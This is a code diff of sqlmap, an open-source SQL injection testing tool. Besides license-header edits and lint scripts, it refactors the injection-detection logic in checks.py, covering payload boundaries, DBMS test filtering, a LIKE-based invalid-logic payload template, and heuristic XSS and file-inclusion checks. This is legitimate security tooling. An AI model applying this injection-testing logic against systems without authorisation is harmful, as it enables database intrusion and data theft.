 pass
@@ -3,8 +3,8 @@
 """
 safe2bin.py - Simple safe(hex) to binary format converter
 
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 import binascii
@@ -1,7 +1,7 @@
 #!/bin/bash
 
 # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
+# See the file 'LICENSE' for copying permission
 
 # Removes trailing spaces from blank lines inside project files
 find . -type f -iname '*.py' -exec sed -i 's/^[ \t]*$//' {} \;
extra/shutils/duplicates.py — mode change: Normal file → Executable file (4 lines changed)
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
+# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+# See the file 'LICENSE' for copying permission
 
 # Removes duplicate entries in wordlist like files
 
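The hunk above only touches the header of extra/shutils/duplicates.py, whose stated job is removing duplicate entries from wordlist-like files. A minimal sketch of that idea is shown below; it is not the project's actual implementation, and the in-place rewrite and command-line argument are assumptions made for illustration.

```python
import sys

def dedupe_wordlist(path):
    # Drop repeated lines while keeping the first occurrence and the original order.
    seen = set()
    kept = []
    with open(path) as infile:
        for line in infile:
            if line not in seen:
                seen.add(line)
                kept.append(line)
    with open(path, "w") as outfile:
        outfile.writelines(kept)

if __name__ == "__main__":
    dedupe_wordlist(sys.argv[1])
```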
extra/shutils/newlines.py (new file, 30 lines)
@@ -0,0 +1,30 @@
+#! /usr/bin/env python
+
+# Runs pylint on all python scripts found in a directory tree
+# Reference: http://rowinggolfer.blogspot.com/2009/08/pylint-recursively.html
+
+import os
+import sys
+
+def check(filepath):
+    if filepath.endswith(".py"):
+        content = open(filepath, "rb").read()
+
+        if "\n\n\n" in content:
+            index = content.find("\n\n\n")
+            print filepath, repr(content[index - 30:index + 30])
+
+if __name__ == "__main__":
+    try:
+        BASE_DIRECTORY = sys.argv[1]
+    except IndexError:
+        print "no directory specified, defaulting to current working directory"
+        BASE_DIRECTORY = os.getcwd()
+
+    print "looking for *.py scripts in subdirectories of ", BASE_DIRECTORY
+    for root, dirs, files in os.walk(BASE_DIRECTORY):
+        if any(_ in root for _ in ("extra", "thirdparty")):
+            continue
+        for name in files:
+            filepath = os.path.join(root, name)
+            check(filepath)
@@ -1,7 +0,0 @@
-#!/bin/bash
-
-# Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
-
-# Runs pep8 on all python files (prerequisite: apt-get install pep8)
-find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pep8 '{}' \;
extra/shutils/postcommit-hook.sh — mode change: Normal file → Executable file (0 lines changed)
extra/shutils/precommit-hook.sh — mode change: Normal file → Executable file (0 lines changed)

extra/shutils/pycodestyle.sh (new executable file, 7 lines)
@@ -0,0 +1,7 @@
+#!/bin/bash
+
+# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+# See the file 'LICENSE' for copying permission
+
+# Runs pycodestyle on all python files (prerequisite: pip install pycodestyle)
+find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pycodestyle --ignore=E501,E302,E305,E722,E402 '{}' \;
2  extra/shutils/pydiatra.sh  Normal file → Executable file
@@ -1,7 +1,7 @@
 #!/bin/bash
 
 # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
+# See the file 'LICENSE' for copying permission
 
 # Runs py2diatra on all python files (prerequisite: pip install pydiatra)
 find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec py2diatra '{}' \; | grep -v bare-except
@@ -1,7 +1,7 @@
 #!/bin/bash
 
 # Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
+# See the file 'LICENSE' for copying permission
 
 # Runs pyflakes on all python files (prerequisite: apt-get install pyflakes)
 find . -wholename "./thirdparty" -prune -o -type f -iname "*.py" -exec pyflakes '{}' \;
4  extra/shutils/pylint.py  Normal file → Executable file
@@ -20,11 +20,11 @@ def check(module):
         print "CHECKING ", module
         pout = os.popen("pylint --rcfile=/dev/null %s" % module, 'r')
         for line in pout:
-            if re.match("\AE:", line):
+            if re.match(r"\AE:", line):
                 print line.strip()
             if __RATING__ and "Your code has been rated at" in line:
                 print line
-                score = re.findall("\d.\d\d", line)[0]
+                score = re.findall(r"\d.\d\d", line)[0]
                 total += float(score)
                 count += 1
 
15  extra/shutils/pypi.sh  Normal file → Executable file
@@ -1,5 +1,10 @@
 #!/bin/bash
 
+if [ ! -f ~/.pypirc ]; then
+    echo "File ~/.pypirc is missing"
+    exit 1
+fi
+
 declare -x SCRIPTPATH="${0}"
 SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
 VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
@@ -11,8 +16,8 @@ cat > $TMP_DIR/setup.py << EOF
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 from setuptools import setup, find_packages
@@ -55,8 +60,8 @@ cat > sqlmap/__init__.py << EOF
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 import os
@@ -156,7 +161,7 @@ Links
 .. |Python 2.6|2.7| image:: https://img.shields.io/badge/python-2.6|2.7-yellow.svg
         :target: https://www.python.org/
 .. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg
-        :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING
+        :target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE
 .. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg
         :target: https://twitter.com/sqlmap
 
8  extra/shutils/regressiontest.py  Normal file → Executable file
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
-# Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-# See the file 'doc/COPYING' for copying permission
+# Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+# See the file 'LICENSE' for copying permission
 
 import codecs
 import inspect
@@ -27,7 +27,7 @@ SMTP_SERVER = "127.0.0.1"
 SMTP_PORT = 25
 SMTP_TIMEOUT = 30
 FROM = "regressiontest@sqlmap.org"
-#TO = "dev@sqlmap.org"
+# TO = "dev@sqlmap.org"
 TO = ["bernardo.damele@gmail.com", "miroslav.stampar@gmail.com"]
 SUBJECT = "regression test started on %s using revision %s" % (START_TIME, getRevisionNumber())
 TARGET = "debian"
@@ -83,7 +83,7 @@ def main():
     if stderr:
         failure_email("Execution of regression test failed with error:\n\n%s" % stderr)
 
-    failed_tests = re.findall("running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)
+    failed_tests = re.findall(r"running live test case: (.+?) \((\d+)\/\d+\)[\r]*\n.+test failed (at parsing items: (.+))?\s*\- scan folder: (\/.+) \- traceback: (.*?)( - SQL injection not detected)?[\r]*\n", stdout)
 
     for failed_test in failed_tests:
         title = failed_test[0]
0  extra/shutils/strip.sh  Normal file → Executable file
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 pass
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 import cookielib
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 pass
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 pass
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 from lib.controller.handler import setHandler
@@ -1,12 +1,13 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 import copy
 import httplib
+import logging
 import os
 import random
 import re
@@ -42,9 +43,11 @@ from lib.core.common import readInput
 from lib.core.common import showStaticWords
 from lib.core.common import singleTimeLogMessage
 from lib.core.common import singleTimeWarnMessage
+from lib.core.common import unArrayizeValue
 from lib.core.common import urlencode
 from lib.core.common import wasLastResponseDBMSError
 from lib.core.common import wasLastResponseHTTPError
+from lib.core.convert import unicodeencode
 from lib.core.defaults import defaults
 from lib.core.data import conf
 from lib.core.data import kb
@@ -52,6 +55,7 @@ from lib.core.data import logger
 from lib.core.datatype import AttribDict
 from lib.core.datatype import InjectionDict
 from lib.core.decorators import cachedmethod
+from lib.core.decorators import stackedmethod
 from lib.core.dicts import FROM_DUMMY_TABLE
 from lib.core.enums import DBMS
 from lib.core.enums import HASHDB_KEYS
@@ -73,6 +77,7 @@ from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH
 from lib.core.settings import CHECK_INTERNET_ADDRESS
 from lib.core.settings import CHECK_INTERNET_VALUE
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.settings import DEV_EMAIL_ADDRESS
 from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
 from lib.core.settings import FI_ERROR_REGEX
 from lib.core.settings import FORMAT_EXCEPTION_STRINGS
@@ -107,6 +112,9 @@ def checkSqlInjection(place, parameter, value):
     if value.isdigit():
         kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
         boundaries = kb.cache.intBoundaries
+    elif value.isalpha():
+        kb.cache.alphaBoundaries = kb.cache.alphaBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: not any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
+        boundaries = kb.cache.alphaBoundaries
     else:
         boundaries = conf.boundaries
 
@@ -140,8 +148,7 @@ def checkSqlInjection(place, parameter, value):
             # error message, simple heuristic check or via DBMS-specific
             # payload), ask the user to limit the tests to the fingerprinted
             # DBMS
-            if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), \
-               SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
+            if kb.reduceTests is None and not conf.testFilter and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
                 msg = "it looks like the back-end DBMS is '%s'. " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
                 msg += "Do you want to skip test payloads specific for other DBMSes? [Y/n]"
                 kb.reduceTests = (Backend.getErrorParsedDBMSes() or [kb.heuristicDbms]) if readInput(msg, default='Y', boolean=True) else []
@@ -150,9 +157,7 @@ def checkSqlInjection(place, parameter, value):
             # message, via simple heuristic check or via DBMS-specific
             # payload), ask the user to extend the tests to all DBMS-specific,
             # regardless of --level and --risk values provided
-            if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) \
-               and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or \
-               kb.heuristicDbms or injection.dbms):
+            if kb.extendTests is None and not conf.testFilter and (conf.level < 5 or conf.risk < 3) and (intersect(Backend.getErrorParsedDBMSes(), SUPPORTED_DBMS, True) or kb.heuristicDbms or injection.dbms):
                 msg = "for the remaining tests, do you want to include all tests "
                 msg += "for '%s' extending provided " % (Format.getErrorParsedDBMSes() or kb.heuristicDbms or injection.dbms)
                 msg += "level (%d)" % conf.level if conf.level < 5 else ""
@@ -200,7 +205,7 @@ def checkSqlInjection(place, parameter, value):
                 continue
 
             match = re.search(r"(\d+)-(\d+)", test.request.columns)
-            if injection.data and match:
+            if match and injection.data:
                 lower, upper = int(match.group(1)), int(match.group(2))
                 for _ in (lower, upper):
                     if _ > 1:
@@ -236,9 +241,7 @@ def checkSqlInjection(place, parameter, value):
 
             # Skip tests if title, vector or DBMS is not included by the
             # given test filter
-            if conf.testFilter and not any(conf.testFilter in str(item) or \
-               re.search(conf.testFilter, str(item), re.I) for item in \
-               (test.title, test.vector, payloadDbms)):
+            if conf.testFilter and not any(conf.testFilter in str(item) or re.search(conf.testFilter, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
                 debugMsg = "skipping test '%s' because its " % title
                 debugMsg += "name/vector/DBMS is not included by the given filter"
                 logger.debug(debugMsg)
@@ -246,9 +249,7 @@ def checkSqlInjection(place, parameter, value):
 
             # Skip tests if title, vector or DBMS is included by the
             # given skip filter
-            if conf.testSkip and any(conf.testSkip in str(item) or \
-               re.search(conf.testSkip, str(item), re.I) for item in \
-               (test.title, test.vector, payloadDbms)):
+            if conf.testSkip and any(conf.testSkip in str(item) or re.search(conf.testSkip, str(item), re.I) for item in (test.title, test.vector, payloadDbms)):
                 debugMsg = "skipping test '%s' because its " % title
                 debugMsg += "name/vector/DBMS is included by the given skip filter"
                 logger.debug(debugMsg)
@@ -257,26 +258,32 @@ def checkSqlInjection(place, parameter, value):
             if payloadDbms is not None:
                 # Skip DBMS-specific test if it does not match the user's
                 # provided DBMS
-                if conf.dbms is not None and not intersect(payloadDbms, conf.dbms, True):
+                if conf.dbms and not intersect(payloadDbms, conf.dbms, True):
                     debugMsg = "skipping test '%s' because " % title
-                    debugMsg += "the provided DBMS is %s" % conf.dbms
+                    debugMsg += "its declared DBMS is different than provided"
+                    logger.debug(debugMsg)
+                    continue
+
+                if kb.dbmsFilter and not intersect(payloadDbms, kb.dbmsFilter, True):
+                    debugMsg = "skipping test '%s' because " % title
+                    debugMsg += "its declared DBMS is different than provided"
                     logger.debug(debugMsg)
                     continue
 
                 # Skip DBMS-specific test if it does not match the
                 # previously identified DBMS (via DBMS-specific payload)
-                if injection.dbms is not None and not intersect(payloadDbms, injection.dbms, True):
-                    debugMsg = "skipping test '%s' because the identified " % title
-                    debugMsg += "back-end DBMS is %s" % injection.dbms
+                if injection.dbms and not intersect(payloadDbms, injection.dbms, True):
+                    debugMsg = "skipping test '%s' because " % title
+                    debugMsg += "its declared DBMS is different than identified"
                     logger.debug(debugMsg)
                     continue
 
                 # Skip DBMS-specific test if it does not match the
                 # previously identified DBMS (via DBMS-specific error message)
                 if kb.reduceTests and not intersect(payloadDbms, kb.reduceTests, True):
-                    debugMsg = "skipping test '%s' because the parsed " % title
-                    debugMsg += "error message(s) showed that the back-end DBMS "
-                    debugMsg += "could be %s" % Format.getErrorParsedDBMSes()
+                    debugMsg = "skipping test '%s' because the heuristic " % title
+                    debugMsg += "tests showed that the back-end DBMS "
+                    debugMsg += "could be '%s'" % unArrayizeValue(kb.reduceTests)
                     logger.debug(debugMsg)
                     continue
 
@@ -324,6 +331,23 @@ def checkSqlInjection(place, parameter, value):
                 logger.debug(debugMsg)
                 continue
 
+            if stype == PAYLOAD.TECHNIQUE.UNION:
+                match = re.search(r"(\d+)-(\d+)", test.request.columns)
+                if match and not injection.data:
+                    _ = test.request.columns.split('-')[-1]
+                    if conf.uCols is None and _.isdigit() and int(_) > 10:
+                        if kb.futileUnion is None:
+                            msg = "it is not recommended to perform "
+                            msg += "extended UNION tests if there is not "
+                            msg += "at least one other (potential) "
+                            msg += "technique found. Do you want to skip? [Y/n] "
+                            kb.futileUnion = not readInput(msg, default='Y', boolean=True)
+
+                        if kb.futileUnion is False:
+                            debugMsg = "skipping test '%s'" % title
+                            logger.debug(debugMsg)
+                            continue
+
             infoMsg = "testing '%s'" % title
             logger.info(infoMsg)
 
@@ -409,7 +433,7 @@ def checkSqlInjection(place, parameter, value):
 
                     if conf.invalidLogical:
                         _ = int(kb.data.randomInt[:2])
-                        origValue = "%s AND %s=%s" % (value, _, _ + 1)
+                        origValue = "%s AND %s LIKE %s" % (value, _, _ + 1)
                     elif conf.invalidBignum:
                         origValue = kb.data.randomInt[:6]
                     elif conf.invalidString:
@@ -430,11 +454,13 @@ def checkSqlInjection(place, parameter, value):
                     boundPayload = agent.prefixQuery(fstPayload, prefix, where, clause)
                     boundPayload = agent.suffixQuery(boundPayload, comment, suffix, where)
                     reqPayload = agent.payload(place, parameter, newValue=boundPayload, where=where)
 
                     if reqPayload:
-                        if reqPayload in seenPayload:
+                        stripPayload = re.sub(r"(\A|\b|_)([A-Za-z]{4}((?<!LIKE))|\d+)(_|\b|\Z)", r"\g<1>.\g<4>", reqPayload)
+                        if stripPayload in seenPayload:
                             continue
                         else:
-                            seenPayload.add(reqPayload)
+                            seenPayload.add(stripPayload)
                     else:
                         reqPayload = None
 
@@ -486,12 +512,16 @@ def checkSqlInjection(place, parameter, value):
                             errorResult = Request.queryPage(errorPayload, place, raise404=False)
                             if errorResult:
                                 continue
-                        elif not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
+                        elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
                             _ = comparison(kb.heuristicPage, None, getRatioValue=True)
                             if _ > kb.matchRatio:
                                 kb.matchRatio = _
                                 logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)
 
+                        # Reducing false-positive "appears" messages in heavily dynamic environment
+                        if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):
+                            continue
+
                         injectable = True
 
                     elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
@@ -499,8 +529,13 @@ def checkSqlInjection(place, parameter, value):
                             trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
                             falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))
 
+                            if threadData.lastErrorPage and threadData.lastErrorPage[1]:
+                                errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, "\n").split("\n"))
+                            else:
+                                errorSet = set()
+
                             if originalSet == trueSet != falseSet:
-                                candidates = trueSet - falseSet
+                                candidates = trueSet - falseSet - errorSet
 
                                 if candidates:
                                     candidates = sorted(candidates, key=lambda _: len(_))
@@ -523,12 +558,18 @@ def checkSqlInjection(place, parameter, value):
                                     logger.info(infoMsg)
                             else:
                                 trueSet = set(extractTextTagContent(trueRawResponse))
-                                trueSet = trueSet.union(__ for _ in trueSet for __ in _.split())
+                                trueSet |= set(__ for _ in trueSet for __ in _.split())
 
                                 falseSet = set(extractTextTagContent(falseRawResponse))
-                                falseSet = falseSet.union(__ for _ in falseSet for __ in _.split())
+                                falseSet |= set(__ for _ in falseSet for __ in _.split())
 
-                                candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet)))
+                                if threadData.lastErrorPage and threadData.lastErrorPage[1]:
+                                    errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))
+                                    errorSet |= set(__ for _ in errorSet for __ in _.split())
+                                else:
+                                    errorSet = set()
+
+                                candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet)))
 
                                 if candidates:
                                     candidates = sorted(candidates, key=lambda _: len(_))
@@ -565,10 +606,10 @@ def checkSqlInjection(place, parameter, value):
                         # body for the test's <grep> regular expression
                         try:
                             page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
-                            output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
-                                    or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
-                                    or extractRegexResult(check, listToStrValue([headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()] if headers else None), re.DOTALL | re.IGNORECASE) \
-                                    or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
+                            output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
+                            output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
+                            output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
+                            output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
 
                             if output:
                                 result = output == "1"
@@ -618,13 +659,16 @@ def checkSqlInjection(place, parameter, value):
 
                 configUnion(test.request.char, test.request.columns)
 
-                if not Backend.getIdentifiedDbms():
+                if len(kb.dbmsFilter or []) == 1:
+                    Backend.forceDbms(kb.dbmsFilter[0])
+                elif not Backend.getIdentifiedDbms():
                     if kb.heuristicDbms is None:
-                        warnMsg = "using unescaped version of the test "
-                        warnMsg += "because of zero knowledge of the "
-                        warnMsg += "back-end DBMS. You can try to "
-                        warnMsg += "explicitly set it with option '--dbms'"
-                        singleTimeWarnMessage(warnMsg)
+                        if kb.heuristicTest == HEURISTIC_TEST.POSITIVE or injection.data:
+                            warnMsg = "using unescaped version of the test "
+                            warnMsg += "because of zero knowledge of the "
+                            warnMsg += "back-end DBMS. You can try to "
+                            warnMsg += "explicitly set it with option '--dbms'"
+                            singleTimeWarnMessage(warnMsg)
                     else:
                         Backend.forceDbms(kb.heuristicDbms)
 
@@ -634,18 +678,6 @@ def checkSqlInjection(place, parameter, value):
                     infoMsg += "there is at least one other (potential) "
                    infoMsg += "technique found"
                    singleTimeLogMessage(infoMsg)
-                elif not injection.data:
-                    _ = test.request.columns.split('-')[-1]
-                    if _.isdigit() and int(_) > 10:
-                        if kb.futileUnion is None:
-                            msg = "it is not recommended to perform "
-                            msg += "extended UNION tests if there is not "
-                            msg += "at least one other (potential) "
-                            msg += "technique found. Do you want to skip? [Y/n] "
-
-                            kb.futileUnion = not readInput(msg, default='Y', boolean=True)
-                        if kb.futileUnion is False:
-                            continue
 
                 # Test for UNION query SQL injection
                 reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
@@ -662,7 +694,7 @@ def checkSqlInjection(place, parameter, value):
 
             kb.previousMethod = method
 
-            if conf.dummy or conf.offline:
+            if conf.offline:
                 injectable = False
 
             # If the injection test was successful feed the injection
@@ -751,7 +783,7 @@ def checkSqlInjection(place, parameter, value):
 
             if conf.multipleTargets:
                 msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
-                choice = readInput(msg, default='T', checkBatch=False).upper()
+                choice = readInput(msg, default='X', checkBatch=False).upper()
             else:
                 msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
                 choice = readInput(msg, default='S', checkBatch=False).upper()
@@ -804,6 +836,7 @@ def checkSqlInjection(place, parameter, value):
 
     return injection
 
+@stackedmethod
 def heuristicCheckDbms(injection):
     """
     This functions is called when boolean-based blind is identified with a
@@ -840,6 +873,7 @@ def heuristicCheckDbms(injection):
 
     return retVal
 
+@stackedmethod
 def checkFalsePositives(injection):
     """
     Checks for false positives (only in single special cases)
@@ -847,8 +881,7 @@ def checkFalsePositives(injection):
 
     retVal = True
 
-    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
-       (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
+    if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
         pushValue(kb.injection)
 
         infoMsg = "checking if the injection point on %s " % injection.place
@@ -902,6 +935,7 @@ def checkFalsePositives(injection):
 
     return retVal
 
+@stackedmethod
 def checkSuhosinPatch(injection):
     """
    Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
@@ -909,7 +943,7 @@ def checkSuhosinPatch(injection):
 
     if injection.place == PLACE.GET:
         debugMsg = "checking for parameter length "
-        debugMsg += "constrainting mechanisms"
+        debugMsg += "constraining mechanisms"
         logger.debug(debugMsg)
 
         pushValue(kb.injection)
@@ -918,13 +952,14 @@ def checkSuhosinPatch(injection):
         randInt = randomInt()
 
         if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
-            warnMsg = "parameter length constrainting "
+            warnMsg = "parameter length constraining "
             warnMsg += "mechanism detected (e.g. Suhosin patch). "
             warnMsg += "Potential problems in enumeration phase can be expected"
             logger.warn(warnMsg)
 
         kb.injection = popValue()
 
+@stackedmethod
 def checkFilteredChars(injection):
     debugMsg = "checking for filtered characters"
     logger.debug(debugMsg)
@@ -945,7 +980,7 @@ def checkFilteredChars(injection):
 
     # inference techniques depend on character '>'
     if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
-        if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
+        if not checkBooleanExpression("%d>%d" % (randInt + 1, randInt)):
             warnMsg = "it appears that the character '>' is "
             warnMsg += "filtered by the back-end server. You are strongly "
             warnMsg += "advised to rerun with the '--tamper=between'"
@@ -959,6 +994,11 @@ def heuristicCheckSqlInjection(place, parameter):
         logger.debug(debugMsg)
         return None
 
+    if kb.heavilyDynamic:
+        debugMsg = "heuristic check skipped because of heavy dynamicity"
+        logger.debug(debugMsg)
+        return None
+
     origValue = conf.paramDict[place][parameter]
     paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
 
@@ -1042,13 +1082,13 @@ def heuristicCheckSqlInjection(place, parameter):
 
     if value.lower() in (page or "").lower():
         infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
-        infoMsg += "'%s' might be vulnerable to cross-site scripting attacks" % parameter
+        infoMsg += "'%s' might be vulnerable to cross-site scripting (XSS) attacks" % parameter
         logger.info(infoMsg)
 
     for match in re.finditer(FI_ERROR_REGEX, page or ""):
         if randStr1.lower() in match.group(0).lower():
             infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
-            infoMsg += "'%s' might be vulnerable to file inclusion attacks" % parameter
+            infoMsg += "'%s' might be vulnerable to file inclusion (FI) attacks" % parameter
             logger.info(infoMsg)
             break
 
@@ -1134,16 +1174,18 @@ def checkDynamicContent(firstPage, secondPage):
             count += 1
 
             if count > conf.retries:
-                warnMsg = "target URL is too dynamic. "
+                warnMsg = "target URL content appears to be too dynamic. "
                 warnMsg += "Switching to '--text-only' "
                 logger.warn(warnMsg)
 
                 conf.textOnly = True
                 return
 
-            warnMsg = "target URL is heavily dynamic"
-            warnMsg += ". sqlmap is going to retry the request"
-            logger.critical(warnMsg)
+            warnMsg = "target URL content appears to be heavily dynamic. "
+            warnMsg += "sqlmap is going to retry the request(s)"
+            singleTimeLogMessage(warnMsg, logging.CRITICAL)
 
+            kb.heavilyDynamic = True
+
             secondPage, _, _ = Request.queryPage(content=True)
             findDynamicContent(firstPage, secondPage)
@@ -1159,7 +1201,7 @@ def checkStability():
    like for instance string matching (--string).
    """
 
-    infoMsg = "testing if the target URL is stable"
+    infoMsg = "testing if the target URL content is stable"
    logger.info(infoMsg)
 
    firstPage = kb.originalPage  # set inside checkConnection()
@@ -1177,7 +1219,7 @@ def checkStability():
 
     if kb.pageStable:
         if firstPage:
-            infoMsg = "target URL is stable"
+            infoMsg = "target URL content is stable"
             logger.info(infoMsg)
         else:
             errMsg = "there was an error checking the stability of page "
@@ -1187,12 +1229,11 @@ def checkStability():
             logger.error(errMsg)
 
     else:
-        warnMsg = "target URL is not stable. sqlmap will base the page "
+        warnMsg = "target URL content is not stable. sqlmap will base the page "
         warnMsg += "comparison on a sequence matcher. If no dynamic nor "
         warnMsg += "injectable parameters are detected, or in case of "
